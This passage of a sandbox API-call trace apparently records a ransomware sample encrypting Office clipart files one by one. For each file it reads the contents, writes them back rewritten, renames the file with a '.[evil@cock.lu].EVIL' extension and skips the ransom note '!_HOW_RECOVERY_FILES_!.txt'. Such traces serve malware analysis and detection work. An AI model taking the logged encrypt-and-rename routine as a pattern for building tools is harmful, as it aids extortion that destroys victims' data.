(_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AG00090_.GIF") returned 0x0 [0105.014] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 0x45 [0105.014] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00090_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0105.016] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x205, lpOverlapped=0x0) returned 1 [0105.023] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0105.023] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0105.023] _errno () returned 0x84b1160840 [0105.023] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.023] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x220, lpOverlapped=0x0) returned 1 [0105.023] CloseHandle (hObject=0x1a8) returned 1 [0105.023] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0105.024] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0105.024] __uncaught_exception () returned 0x84b1160800 [0105.024] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0105.041] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00090_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00090_.gif.[evil@cock.lu].evil")) returned 1 [0105.042] ??_V@YAXPEAX@Z () returned 0x1 [0105.045] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF", dwFileAttributes=0x200) returned 0 [0105.045] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0105.045] wcsstr (_Str="AG00092_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0105.045] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 69 [0105.045] wcscmp (_String1="AG00092_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0105.045] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AG00092_.GIF") returned 0x0 [0105.045] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 0x45 [0105.045] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00092_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0105.046] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1f6, lpOverlapped=0x0) returned 1 [0105.053] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0105.053] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0105.053] _errno () returned 0x84b1160840 [0105.053] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.053] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x200, lpOverlapped=0x0) returned 1 [0105.053] CloseHandle (hObject=0x1a8) returned 1 [0105.053] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0105.053] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0105.053] __uncaught_exception () returned 0x84b1160800 [0105.054] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0105.061] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00092_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00092_.gif.[evil@cock.lu].evil")) returned 1 [0105.061] ??_V@YAXPEAX@Z () returned 0x1 [0105.064] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF", dwFileAttributes=0x200) returned 0 [0105.064] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0105.064] wcsstr (_Str="AG00103_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0105.064] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 69 [0105.064] wcscmp (_String1="AG00103_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0105.064] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AG00103_.GIF") returned 0x0 [0105.064] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 0x45 [0105.064] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00103_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0105.066] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x319e, lpOverlapped=0x0) returned 1 [0105.072] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0105.072] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0105.072] _errno () returned 0x84b1160840 [0105.072] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.073] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x31a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x31a0, lpOverlapped=0x0) returned 1 [0105.073] CloseHandle (hObject=0x1a8) returned 1 [0105.073] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0105.073] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0105.073] __uncaught_exception () returned 0x84b1160800 [0105.073] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0105.073] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00103_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00103_.gif.[evil@cock.lu].evil")) returned 1 [0105.074] ??_V@YAXPEAX@Z () returned 0x1 [0105.076] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF", dwFileAttributes=0x200) returned 0 [0105.077] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0105.077] wcsstr (_Str="AG00120_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0105.077] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 69 [0105.077] wcscmp (_String1="AG00120_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0105.077] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AG00120_.GIF") returned 0x0 [0105.077] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 0x45 [0105.077] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00120_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0105.078] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xd9c, lpOverlapped=0x0) returned 1 [0106.329] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.329] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.329] _errno () returned 0x84b1160840 [0106.329] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.330] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0xda0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xda0, lpOverlapped=0x0) returned 1 [0106.381] CloseHandle (hObject=0x1a8) returned 1 [0106.381] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0106.382] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0106.382] __uncaught_exception () returned 0x84b1160800 [0106.382] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0106.382] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00120_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00120_.gif.[evil@cock.lu].evil")) returned 1 [0106.383] ??_V@YAXPEAX@Z () returned 0x1 [0106.391] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF", dwFileAttributes=0x200) returned 0 [0106.392] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0106.392] wcsstr (_Str="AG00126_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0106.392] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 69 [0106.392] wcscmp (_String1="AG00126_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0106.392] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AG00126_.GIF") returned 0x0 [0106.392] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 0x45 [0106.392] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00126_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0106.394] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xc44, lpOverlapped=0x0) returned 1 [0106.427] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.427] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.427] _errno () returned 0x84b1160840 [0106.427] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.427] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0xc60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xc60, lpOverlapped=0x0) returned 1 [0106.427] CloseHandle (hObject=0x1a8) returned 1 [0106.427] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0106.427] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0106.427] __uncaught_exception () returned 0x84b1160800 [0106.427] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0106.428] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00126_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00126_.gif.[evil@cock.lu].evil")) returned 1 [0106.428] ??_V@YAXPEAX@Z () returned 0x1 [0106.431] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF", dwFileAttributes=0x200) returned 0 [0106.431] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0106.431] wcsstr (_Str="AG00129_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0106.431] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 69 [0106.431] wcscmp (_String1="AG00129_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0106.431] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AG00129_.GIF") returned 0x0 [0106.431] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 0x45 [0106.431] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00129_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0106.439] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x30c2, lpOverlapped=0x0) returned 1 [0106.455] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.455] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.455] _errno () returned 0x84b1160840 [0106.455] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.455] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x30e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x30e0, lpOverlapped=0x0) returned 1 [0106.455] CloseHandle (hObject=0x1a8) returned 1 [0106.455] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0106.455] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0106.455] __uncaught_exception () returned 0x84b1160800 [0106.455] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0106.456] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00129_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00129_.gif.[evil@cock.lu].evil")) returned 1 [0106.470] ??_V@YAXPEAX@Z () returned 0x1 [0106.473] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF", dwFileAttributes=0x200) returned 0 [0106.473] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0106.473] wcsstr (_Str="AG00130_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0106.473] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 69 [0106.473] wcscmp (_String1="AG00130_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0106.473] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AG00130_.GIF") returned 0x0 [0106.473] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 0x45 [0106.473] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00130_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0106.475] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1485, lpOverlapped=0x0) returned 1 [0106.487] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.487] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.487] _errno () returned 0x84b1160840 [0106.487] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.487] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x14a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x14a0, lpOverlapped=0x0) returned 1 [0106.487] CloseHandle (hObject=0x1a8) returned 1 [0106.487] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0106.487] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0106.487] __uncaught_exception () returned 0x84b1160800 [0106.487] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0106.488] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00130_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00130_.gif.[evil@cock.lu].evil")) returned 1 [0106.494] ??_V@YAXPEAX@Z () returned 0x1 [0106.496] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF", dwFileAttributes=0x200) returned 0 [0106.496] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0106.497] wcsstr (_Str="AG00135_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0106.497] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 69 [0106.497] wcscmp (_String1="AG00135_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0106.497] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AG00135_.GIF") returned 0x0 [0106.497] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 0x45 [0106.497] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00135_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0106.498] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa24, lpOverlapped=0x0) returned 1 [0106.501] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.501] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.501] _errno () returned 0x84b1160840 [0106.501] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.501] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0xa40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xa40, lpOverlapped=0x0) returned 1 [0106.501] CloseHandle (hObject=0x1a8) returned 1 [0106.501] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0106.501] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0106.501] __uncaught_exception () returned 0x84b1160800 [0106.501] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0106.501] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00135_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00135_.gif.[evil@cock.lu].evil")) returned 1 [0106.502] ??_V@YAXPEAX@Z () returned 0x1 [0106.504] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF", dwFileAttributes=0x200) returned 0 [0106.505] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0106.505] wcsstr (_Str="AG00139_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0106.505] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 69 [0106.505] wcscmp (_String1="AG00139_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0106.505] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AG00139_.GIF") returned 0x0 [0106.505] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 0x45 [0106.505] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft 